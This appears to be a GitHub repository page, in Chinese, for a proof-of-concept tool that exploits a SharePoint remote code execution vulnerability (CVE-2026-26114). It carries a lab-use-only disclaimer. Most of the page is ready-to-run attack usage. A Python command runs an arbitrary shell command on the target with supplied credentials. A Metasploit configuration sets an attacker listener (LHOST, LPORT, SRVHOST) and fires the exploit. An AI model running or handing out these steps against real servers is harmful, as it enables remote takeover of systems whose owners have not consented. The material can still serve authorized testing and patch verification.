huynambka/cve-2026-26114-poc

GitHub: huynambka/cve-2026-26114-poc

针对 SharePoint CVE-2026-26114 远程代码执行漏洞的 PoC 工具,提供 Python 脚本和 Metasploit 模块两种利用途径。

Stars: 11 | Forks: 6

# CVE-2026-26114 仅供在实验室或授权测试系统中使用。 ## Python PoC ``` pip install requests requests-ntlm python poc/cve_2026_26114_rce.py ^ --target http://sharepoint.local ^ --username sp_user1 ^ --password "Password123!" ^ --domain SP19 ^ --cmd "cmd /c whoami > C:\Windows\Temp\cve_2026_26114.txt" ``` 可以使用 `--proxy http://127.0.0.1:8080`、`--insecure`,或者将 `--cmd` 替换为 `--marker-file C:\Windows\Temp\marker.txt`。 ## Metasploit 模块 模块位于: ``` modules/exploits/windows/http/sharepoint_cve_2026_26114.rb ``` 选项示例: ``` use exploit/windows/http/sharepoint_cve_2026_26114 set RHOSTS sharepoint.local set RPORT 80 set SSL false set TARGETURI / set USERNAME sp_user1 set PASSWORD Password123! set DOMAIN SP19 set SRVHOST 192.168.56.1 set SRVPORT 8080 set LHOST 192.168.56.1 set LPORT 4444 check run ``` 如果不使用 auto-discovery,需额外设置 `TAXONOMY_STORE_ID`、`TAXONOMY_GROUP_ID`、`SITE_ID`、`WEB_ID`、`JOB_CREATOR_ID`。
标签:Python, 安全漏洞, 无后门, 逆向工具